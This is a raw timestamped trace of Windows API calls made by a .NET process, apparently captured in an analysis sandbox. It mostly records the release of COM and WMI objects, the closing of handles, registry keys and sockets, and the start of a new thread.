IUnknown:Release (This=0x5ece290) returned 0x2 [0225.753] IUnknown:Release (This=0x5ece290) returned 0x1 [0225.753] IUnknown:Release (This=0x5e86310) returned 0x0 [0225.753] IUnknown:Release (This=0x796e90) returned 0x0 [0225.754] IUnknown:Release (This=0x6d7a30) returned 0x0 [0225.754] IUnknown:Release (This=0x7492f8) returned 0x0 [0225.754] IUnknown:Release (This=0x5e8d550) returned 0x0 [0225.754] IUnknown:Release (This=0x5ece0f8) returned 0x0 [0225.754] IUnknown:Release (This=0x5ecdf60) returned 0x0 [0225.754] IUnknown:Release (This=0x5ecddc8) returned 0x0 [0225.755] IUnknown:Release (This=0x5ecdc30) returned 0x0 [0225.755] IUnknown:Release (This=0x5ecda98) returned 0x0 [0225.755] IUnknown:Release (This=0x5ecd900) returned 0x0 [0225.755] IUnknown:Release (This=0x5ecd768) returned 0x0 [0225.755] IUnknown:Release (This=0x5ecd5d0) returned 0x0 [0225.755] IUnknown:Release (This=0x5ecd438) returned 0x0 [0225.755] IUnknown:Release (This=0x5ecd2a0) returned 0x0 [0225.756] IUnknown:Release (This=0x5ecd108) returned 0x0 [0225.756] IUnknown:Release (This=0x5eccf70) returned 0x0 [0225.756] IUnknown:Release (This=0x5eccdd8) returned 0x0 [0225.756] IUnknown:Release (This=0x5eccc40) returned 0x0 [0225.757] IUnknown:Release (This=0x5ebd048) returned 0x0 [0225.757] IUnknown:Release (This=0x5ebceb0) returned 0x0 [0225.757] IUnknown:Release (This=0x5ebcd18) returned 0x0 [0225.757] IUnknown:Release (This=0x5ebcb80) returned 0x0 [0225.758] IUnknown:Release (This=0x5ebc9e8) returned 0x0 [0225.758] IUnknown:Release (This=0x5ebc850) returned 0x0 [0225.758] IUnknown:Release (This=0x5ebc6b8) returned 0x0 [0225.758] IUnknown:Release (This=0x5ebc520) returned 0x0 [0225.758] IUnknown:Release (This=0x5ebc388) returned 0x0 [0225.758] IUnknown:Release (This=0x5ebc1f0) returned 0x0 [0225.758] IUnknown:Release (This=0x5ebc058) returned 0x0 [0225.759] IUnknown:Release (This=0x5ebbec0) returned 0x0 [0225.759] IUnknown:Release (This=0x5ebbd28) returned 0x0 [0225.759] IUnknown:Release (This=0x5ebbb90) returned 0x0 [0225.759] IUnknown:Release (This=0x5ebb9f8) returned 0x0 [0225.759] IUnknown:Release (This=0x5ebb860) returned 0x0 [0225.759] IUnknown:Release (This=0x5ebb6c8) returned 0x0 [0225.759] IUnknown:Release (This=0x5ebb530) returned 0x0 [0225.760] IUnknown:Release (This=0x5ebb398) returned 0x0 [0225.760] IUnknown:Release (This=0x5ebb200) returned 0x0 [0225.760] IUnknown:Release (This=0x743bc0) returned 0x0 [0225.760] IUnknown:Release (This=0x743a28) returned 0x0 [0225.760] IUnknown:Release (This=0x743890) returned 0x0 [0225.760] IUnknown:Release (This=0x7436f8) returned 0x0 [0225.760] IUnknown:Release (This=0x743560) returned 0x0 [0225.761] IUnknown:Release (This=0x7433c8) returned 0x0 [0225.761] IUnknown:Release (This=0x743230) returned 0x0 [0225.761] IUnknown:Release (This=0x743098) returned 0x0 [0225.761] IUnknown:Release (This=0x742f00) returned 0x0 [0225.761] IUnknown:Release (This=0x742d68) returned 0x0 [0225.761] IUnknown:Release (This=0x742bd0) returned 0x0 [0225.761] IUnknown:Release (This=0x742a38) returned 0x0 [0225.762] IUnknown:Release (This=0x7428a0) returned 0x0 [0225.762] IUnknown:Release (This=0x742708) returned 0x0 [0225.762] IUnknown:Release (This=0x742570) returned 0x0 [0225.762] IUnknown:Release (This=0x7423d8) returned 0x0 [0225.762] IUnknown:Release (This=0x5e8b638) returned 0x0 [0225.762] IUnknown:Release (This=0x5e8b1c0) returned 0x0 [0225.762] IUnknown:Release (This=0x5e924c8) returned 0x0 [0225.763] IUnknown:Release (This=0x5e92058) returned 0x0 [0225.763] IUnknown:Release (This=0x5e913f0) returned 0x0 [0225.763] IUnknown:Release (This=0x5e90f88) returned 0x0 [0225.763] IUnknown:Release (This=0x5e90af0) returned 0x0 [0225.763] IUnknown:Release (This=0x5e90678) returned 0x0 [0225.763] IUnknown:Release (This=0x5e89a70) returned 0x0 [0225.764] IUnknown:Release (This=0x5e94d28) returned 0x0 [0225.764] RegCloseKey (hKey=0x354) returned 0x0 [0225.764] RegCloseKey (hKey=0x260) returned 0x0 [0225.764] RegCloseKey (hKey=0x250) returned 0x0 [0257.846] EtwEventUnregister () returned 0x0 [0257.846] EtwEventUnregister () returned 0x0 [0257.846] EtwEventUnregister () returned 0x0 [0257.850] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368 [0257.851] PostMessageW (hWnd=0x5021e, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0257.851] CoGetContextToken (in: pToken=0x211f464 | out: pToken=0x211f464) returned 0x0 [0257.851] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x211f488 | out: ppvObject=0x211f488*=0x6ee4bc) returned 0x0 [0257.851] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x211f4b4 | out: pThreadType=0x211f4b4*=0) returned 0x0 [0257.851] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0258.633] CoGetContextToken (in: pToken=0x211f47c | out: pToken=0x211f47c) returned 0x0 [0258.633] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x211f4a0 | out: ppvObject=0x211f4a0*=0x6ee4bc) returned 0x0 [0258.633] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x211f4cc | out: pThreadType=0x211f4cc*=0) returned 0x0 [0258.633] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0258.774] IUnknown:Release (This=0x742a38) returned 0x2 [0258.774] IUnknown:Release (This=0x7428a0) returned 0x2 [0258.774] IUnknown:Release (This=0x742708) returned 0x2 [0258.774] IUnknown:Release (This=0x742570) returned 0x2 [0258.775] IUnknown:Release (This=0x7423d8) returned 0x2 [0258.775] IUnknown:Release (This=0x5ece290) returned 0x0 [0258.779] CloseHandle (hObject=0x2c0) returned 1 [0258.783] EtwEventUnregister () returned 0x0 [0258.788] CloseHandle (hObject=0x544) returned 1 [0258.790] WinHttpCloseHandle (hInternet=0x6f7838) returned 1 [0258.791] CloseHandle (hObject=0x3d8) returned 1 [0258.791] CloseHandle (hObject=0x3d4) returned 1 [0258.791] RegCloseKey (hKey=0x3d0) returned 0x0 [0258.792] CloseHandle (hObject=0x3cc) returned 1 [0258.792] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0258.793] RegCloseKey (hKey=0x3c8) returned 0x0 [0258.793] CloseHandle (hObject=0x3c4) returned 1 [0258.793] RegCloseKey (hKey=0x3c0) returned 0x0 [0258.794] CloseHandle (hObject=0x358) returned 1 [0258.794] RegCloseKey (hKey=0x3bc) returned 0x0 [0258.794] CloseHandle (hObject=0x3a4) returned 1 [0258.795] setsockopt (s=0x39c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0258.796] closesocket (s=0x39c) returned 0 [0258.797] CloseHandle (hObject=0x3a0) returned 1 [0258.797] setsockopt (s=0x394, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0258.797] closesocket (s=0x394) returned 0 [0258.797] CloseHandle (hObject=0x398) returned 1 [0258.798] setsockopt (s=0x43c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0258.798] closesocket (s=0x43c) returned 0 [0258.798] CloseHandle (hObject=0x440) returned 1 [0258.799] CloseHandle (hObject=0x354) returned 1 [0258.799] UnmapViewOfFile (lpBaseAddress=0x670000) returned 1 [0258.800] setsockopt (s=0x418, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0258.801] closesocket (s=0x418) returned 0 [0258.802] CloseHandle (hObject=0x438) returned 1 [0258.802] RegCloseKey (hKey=0x80000004) returned 0x0 [0258.803] CloseHandle (hObject=0x2cc) returned 1 [0258.803] setsockopt (s=0x430, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0258.803] closesocket (s=0x430) returned 0 [0258.805] setsockopt (s=0x264, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0258.805] closesocket (s=0x264) returned 0 [0258.806] CloseHandle (hObject=0x290) returned 1 [0258.807] CloseHandle (hObject=0x368) returned 1 [0258.807] CloseHandle (hObject=0x590) returned 1 [0258.809] CoGetContextToken (in: pToken=0x211f4d4 | out: pToken=0x211f4d4) returned 0x0 [0258.809] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.809] WbemDefPath:IUnknown:Release (This=0x5e8a0b0) returned 0x1 [0258.809] WbemDefPath:IUnknown:Release (This=0x5e8a0b0) returned 0x0 [0258.810] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.810] WbemDefPath:IUnknown:Release (This=0x5eb8118) returned 0x1 [0258.810] WbemDefPath:IUnknown:Release (This=0x5eb8118) returned 0x0 [0258.810] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.810] WbemDefPath:IUnknown:Release (This=0x5e8a970) returned 0x1 [0258.810] WbemDefPath:IUnknown:Release (This=0x5e8a970) returned 0x0 [0258.810] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.810] WbemDefPath:IUnknown:Release (This=0x5ec2ae8) returned 0x1 [0258.810] WbemDefPath:IUnknown:Release (This=0x5ec2ae8) returned 0x0 [0258.810] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.810] WbemDefPath:IUnknown:Release (This=0x5e8a270) returned 0x1 [0258.810] WbemDefPath:IUnknown:Release (This=0x5e8a270) returned 0x0 [0258.811] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.811] WbemDefPath:IUnknown:Release (This=0x5eb82d8) returned 0x1 [0258.811] WbemDefPath:IUnknown:Release (This=0x5eb82d8) returned 0x0 [0258.811] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.811] WbemDefPath:IUnknown:Release (This=0x5e8ac10) returned 0x1 [0258.811] WbemDefPath:IUnknown:Release (This=0x5e8ac10) returned 0x0 [0258.811] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.811] WbemDefPath:IUnknown:Release (This=0x5eb8e38) returned 0x1 [0258.811] WbemDefPath:IUnknown:Release (This=0x5eb8e38) returned 0x0 [0258.811] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.811] WbemDefPath:IUnknown:Release (This=0x5e8a5f0) returned 0x1 [0258.811] WbemDefPath:IUnknown:Release (This=0x5e8a5f0) returned 0x0 [0258.811] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.811] WbemDefPath:IUnknown:Release (This=0x5ed1108) returned 0x1 [0258.811] WbemDefPath:IUnknown:Release (This=0x5ed1108) returned 0x0 [0258.812] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.812] WbemDefPath:IUnknown:Release (This=0x5ec2e68) returned 0x1 [0258.812] WbemDefPath:IUnknown:Release (This=0x5ec2e68) returned 0x0 [0258.812] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.812] WbemDefPath:IUnknown:Release (This=0x5e8a510) returned 0x1 [0258.812] WbemDefPath:IUnknown:Release (This=0x5e8a510) returned 0x0 [0258.812] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.812] WbemDefPath:IUnknown:Release (This=0x5e8a430) returned 0x1 [0258.812] WbemDefPath:IUnknown:Release (This=0x5e8a430) returned 0x0 [0258.812] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.812] WbemDefPath:IUnknown:Release (This=0x5ed0d88) returned 0x1 [0258.812] WbemDefPath:IUnknown:Release (This=0x5ed0d88) returned 0x0 [0258.812] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.813] WbemDefPath:IUnknown:Release (This=0x5eb8658) returned 0x1 [0258.813] WbemDefPath:IUnknown:Release (This=0x5eb8658) returned 0x0 [0258.813] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.813] WbemDefPath:IUnknown:Release (This=0x5e8a190) returned 0x1 [0258.813] WbemDefPath:IUnknown:Release (This=0x5e8a190) returned 0x0 [0258.813] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.813] WbemDefPath:IUnknown:Release (This=0x5ec32c8) returned 0x1 [0258.813] WbemDefPath:IUnknown:Release (This=0x5ec32c8) returned 0x0 [0258.813] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.813] WbemDefPath:IUnknown:Release (This=0x5ed0a08) returned 0x1 [0258.813] WbemDefPath:IUnknown:Release (This=0x5ed0a08) returned 0x0 [0258.813] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.813] WbemDefPath:IUnknown:Release (This=0x5ec2768) returned 0x1 [0258.813] WbemDefPath:IUnknown:Release (This=0x5ec2768) returned 0x0 [0258.814] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.814] WbemDefPath:IUnknown:Release (This=0x5eb83b8) returned 0x1 [0258.814] WbemDefPath:IUnknown:Release (This=0x5eb83b8) returned 0x0 [0258.814] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.814] WbemDefPath:IUnknown:Release (This=0x5e8acf0) returned 0x1 [0258.814] WbemDefPath:IUnknown:Release (This=0x5e8acf0) returned 0x0 [0258.814] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.814] WbemDefPath:IUnknown:Release (This=0x5ec23e8) returned 0x1 [0258.814] WbemDefPath:IUnknown:Release (This=0x5ec23e8) returned 0x0 [0258.814] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.814] WbemDefPath:IUnknown:Release (This=0x5eb8038) returned 0x1 [0258.814] WbemDefPath:IUnknown:Release (This=0x5eb8038) returned 0x0 [0258.814] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.814] WbemDefPath:IUnknown:Release (This=0x5eb8f18) returned 0x1 [0258.815] WbemDefPath:IUnknown:Release (This=0x5eb8f18) returned 0x0 [0258.815] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.815] WbemDefPath:IUnknown:Release (This=0x5e89ef0) returned 0x1 [0258.815] WbemDefPath:IUnknown:Release (This=0x5e89ef0) returned 0x0 [0258.815] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.815] WbemDefPath:IUnknown:Release (This=0x5ec2f48) returned 0x1 [0258.815] WbemDefPath:IUnknown:Release (This=0x5ec2f48) returned 0x0 [0258.815] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.815] WbemDefPath:IUnknown:Release (This=0x768d68) returned 0x1 [0258.815] WbemDefPath:IUnknown:Release (This=0x768d68) returned 0x0 [0258.815] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.815] WbemDefPath:IUnknown:Release (This=0x5eb8b98) returned 0x1 [0258.815] WbemDefPath:IUnknown:Release (This=0x5eb8b98) returned 0x0 [0258.815] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.815] WbemDefPath:IUnknown:Release (This=0x5ed0bc8) returned 0x1 [0258.815] WbemDefPath:IUnknown:Release (This=0x5ed0bc8) returned 0x0 [0258.816] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.816] WbemDefPath:IUnknown:Release (This=0x769078) returned 0x1 [0258.816] WbemDefPath:IUnknown:Release (This=0x769078) returned 0x0 [0258.816] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.816] WbemDefPath:IUnknown:Release (This=0x5ed0e68) returned 0x1 [0258.816] WbemDefPath:IUnknown:Release (This=0x5ed0e68) returned 0x0 [0258.816] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.816] WbemDefPath:IUnknown:Release (This=0x5eb8ab8) returned 0x1 [0258.816] WbemDefPath:IUnknown:Release (This=0x5eb8ab8) returned 0x0 [0258.816] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.816] WbemDefPath:IUnknown:Release (This=0x5ec2bc8) returned 0x1 [0258.816] WbemDefPath:IUnknown:Release (This=0x5ec2bc8) returned 0x0 [0258.816] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.816] WbemDefPath:IUnknown:Release (This=0x5eb8818) returned 0x1 [0258.816] WbemDefPath:IUnknown:Release (This=0x5eb8818) returned 0x0 [0258.817] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.817] WbemDefPath:IUnknown:Release (This=0x5ec31e8) returned 0x1 [0258.817] WbemDefPath:IUnknown:Release (This=0x5ec31e8) returned 0x0 [0258.817] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.817] WbemDefPath:IUnknown:Release (This=0x5ed0ae8) returned 0x1 [0258.817] WbemDefPath:IUnknown:Release (This=0x5ed0ae8) returned 0x0 [0258.817] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.817] WbemDefPath:IUnknown:Release (This=0x5ec2848) returned 0x1 [0258.817] WbemDefPath:IUnknown:Release (This=0x5ec2848) returned 0x0 [0258.817] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.817] WbemDefPath:IUnknown:Release (This=0x5eb8498) returned 0x1 [0258.817] WbemDefPath:IUnknown:Release (This=0x5eb8498) returned 0x0 [0258.817] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.817] WbemDefPath:IUnknown:Release (This=0x5e8add0) returned 0x1 [0258.817] WbemDefPath:IUnknown:Release (This=0x5e8add0) returned 0x0 [0258.818] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.818] WbemDefPath:IUnknown:Release (This=0x5e8a890) returned 0x1 [0258.818] WbemDefPath:IUnknown:Release (This=0x5e8a890) returned 0x0 [0258.818] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.818] WbemDefPath:IUnknown:Release (This=0x5ec24c8) returned 0x1 [0258.818] WbemDefPath:IUnknown:Release (This=0x5ec24c8) returned 0x0 [0258.818] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.818] WbemDefPath:IUnknown:Release (This=0x5e8aa50) returned 0x1 [0258.818] WbemDefPath:IUnknown:Release (This=0x5e8aa50) returned 0x0 [0258.818] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.818] WbemDefPath:IUnknown:Release (This=0x5e8a6d0) returned 0x1 [0258.818] WbemDefPath:IUnknown:Release (This=0x5e8a6d0) returned 0x0 [0258.818] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.818] WbemDefPath:IUnknown:Release (This=0x5ed1028) returned 0x1 [0258.818] WbemDefPath:IUnknown:Release (This=0x5ed1028) returned 0x0 [0258.818] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.819] WbemDefPath:IUnknown:Release (This=0x5ed12c8) returned 0x1 [0258.819] WbemDefPath:IUnknown:Release (This=0x5ed12c8) returned 0x0 [0258.819] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.819] WbemDefPath:IUnknown:Release (This=0x5ec3028) returned 0x1 [0258.819] WbemDefPath:IUnknown:Release (This=0x5ec3028) returned 0x0 [0258.819] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.819] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x1 [0258.819] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x0 [0258.819] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.819] WbemDefPath:IUnknown:Release (This=0x5eb8c78) returned 0x1 [0258.819] WbemDefPath:IUnknown:Release (This=0x5eb8c78) returned 0x0 [0258.819] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.819] WbemDefPath:IUnknown:Release (This=0x5ed0f48) returned 0x1 [0258.819] WbemDefPath:IUnknown:Release (This=0x5ed0f48) returned 0x0 [0258.819] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.819] WbemDefPath:IUnknown:Release (This=0x5ec2ca8) returned 0x1 [0258.819] WbemDefPath:IUnknown:Release (This=0x5ec2ca8) returned 0x0 [0258.820] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.820] WbemDefPath:IUnknown:Release (This=0x5ed11e8) returned 0x1 [0258.820] WbemDefPath:IUnknown:Release (This=0x5ed11e8) returned 0x0 [0258.820] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.820] WbemDefPath:IUnknown:Release (This=0x5eb88f8) returned 0x1 [0258.820] WbemDefPath:IUnknown:Release (This=0x5eb88f8) returned 0x0 [0258.820] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.820] WbemDefPath:IUnknown:Release (This=0x5ec2688) returned 0x1 [0258.820] WbemDefPath:IUnknown:Release (This=0x5ec2688) returned 0x0 [0258.820] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.820] WbemDefPath:IUnknown:Release (This=0x768dd8) returned 0x1 [0258.820] WbemDefPath:IUnknown:Release (This=0x768dd8) returned 0x0 [0258.820] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.820] WbemDefPath:IUnknown:Release (This=0x5e8a350) returned 0x1 [0258.820] WbemDefPath:IUnknown:Release (This=0x5e8a350) returned 0x0 [0258.821] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.821] WbemDefPath:IUnknown:Release (This=0x5ec2928) returned 0x1 [0258.821] WbemDefPath:IUnknown:Release (This=0x5ec2928) returned 0x0 [0258.821] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.821] WbemDefPath:IUnknown:Release (This=0x5eb8578) returned 0x1 [0258.821] WbemDefPath:IUnknown:Release (This=0x5eb8578) returned 0x0 [0258.821] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.821] WbemDefPath:IUnknown:Release (This=0x768a58) returned 0x1 [0258.821] WbemDefPath:IUnknown:Release (This=0x768a58) returned 0x0 [0258.821] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.821] WbemDefPath:IUnknown:Release (This=0x5ec25a8) returned 0x1 [0258.821] WbemDefPath:IUnknown:Release (This=0x5ec25a8) returned 0x0 [0258.821] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.821] WbemDefPath:IUnknown:Release (This=0x769008) returned 0x1 [0258.822] WbemDefPath:IUnknown:Release (This=0x769008) returned 0x0 [0258.822] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.822] WbemDefPath:IUnknown:Release (This=0x5eb81f8) returned 0x1 [0258.822] WbemDefPath:IUnknown:Release (This=0x5eb81f8) returned 0x0 [0258.822] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.822] WbemDefPath:IUnknown:Release (This=0x5e8ab30) returned 0x1 [0258.822] WbemDefPath:IUnknown:Release (This=0x5e8ab30) returned 0x0 [0258.822] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.822] WbemDefPath:IUnknown:Release (This=0x5eb8d58) returned 0x1 [0258.822] WbemDefPath:IUnknown:Release (This=0x5eb8d58) returned 0x0 [0258.822] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.822] WbemDefPath:IUnknown:Release (This=0x5e89fd0) returned 0x1 [0258.822] WbemDefPath:IUnknown:Release (This=0x5e89fd0) returned 0x0 [0258.822] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.822] WbemDefPath:IUnknown:Release (This=0x5ec3108) returned 0x1 [0258.822] WbemDefPath:IUnknown:Release (This=0x5ec3108) returned 0x0 [0258.823] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.823] WbemDefPath:IUnknown:Release (This=0x5e8a7b0) returned 0x1 [0258.823] WbemDefPath:IUnknown:Release (This=0x5e8a7b0) returned 0x0 [0258.823] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.823] WbemDefPath:IUnknown:Release (This=0x5ed0ca8) returned 0x1 [0258.823] WbemDefPath:IUnknown:Release (This=0x5ed0ca8) returned 0x0 [0258.823] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.823] WbemDefPath:IUnknown:Release (This=0x5eb8738) returned 0x1 [0258.823] WbemDefPath:IUnknown:Release (This=0x5eb8738) returned 0x0 [0258.823] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.823] WbemDefPath:IUnknown:Release (This=0x5ec2d88) returned 0x1 [0258.823] WbemDefPath:IUnknown:Release (This=0x5ec2d88) returned 0x0 [0258.823] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.823] WbemDefPath:IUnknown:Release (This=0x5eb89d8) returned 0x1 [0258.823] WbemDefPath:IUnknown:Release (This=0x5eb89d8) returned 0x0 [0258.824] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.824] WbemDefPath:IUnknown:Release (This=0x768eb8) returned 0x1 [0258.824] WbemDefPath:IUnknown:Release (This=0x768eb8) returned 0x0 [0258.824] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.824] WbemDefPath:IUnknown:Release (This=0x5ec2a08) returned 0x1 [0258.824] WbemDefPath:IUnknown:Release (This=0x5ec2a08) returned 0x0 [0258.824] CoGetContextToken (in: pToken=0x211f4d4 | out: pToken=0x211f4d4) returned 0x0 [0258.824] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.824] IUnknown:Release (This=0x742a38) returned 0x1 [0258.824] IUnknown:Release (This=0x742a38) returned 0x0 [0258.824] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.824] IUnknown:Release (This=0x7428a0) returned 0x1 [0258.824] IUnknown:Release (This=0x7428a0) returned 0x0 [0258.824] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.824] IUnknown:Release (This=0x742570) returned 0x1 [0258.824] IUnknown:Release (This=0x742570) returned 0x0 [0258.825] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.825] IUnknown:Release (This=0x7423d8) returned 0x1 [0258.825] IUnknown:Release (This=0x7423d8) returned 0x0 [0258.825] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.825] IUnknown:Release (This=0x742708) returned 0x1 [0258.825] IUnknown:Release (This=0x742708) returned 0x0 [0258.825] CoGetContextToken (in: pToken=0x211f458 | out: pToken=0x211f458) returned 0x0 [0258.825] WbemLocator:IUnknown:Release (This=0x793148) returned 0x1 [0258.825] WbemLocator:IUnknown:Release (This=0x793148) returned 0x0 [0258.943] IUnknown:Release (This=0x6ee4b0) returned 0x0 Thread: id = 103 os_tid = 0xed4 Thread: id = 110 os_tid = 0xf0c Thread: id = 111 os_tid = 0xf10 [0176.266] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0176.272] SetConsoleCtrlHandler (HandlerRoutine=0x48e0b0e, Add=1) returned 1 [0176.272] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0176.273] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0176.274] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.3ce0bb8.0", lpWndClass=0x2472d1c | out: lpWndClass=0x2472d1c) returned 0 [0176.277] CoTaskMemAlloc (cb=0x58) returned 0x72b9a0 [0176.277] RegisterClassW (lpWndClass=0x4e1f688) returned 0xc1b9 [0176.278] CoTaskMemFree (pv=0x72b9a0) [0176.280] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.3ce0bb8.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.3ce0bb8.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, 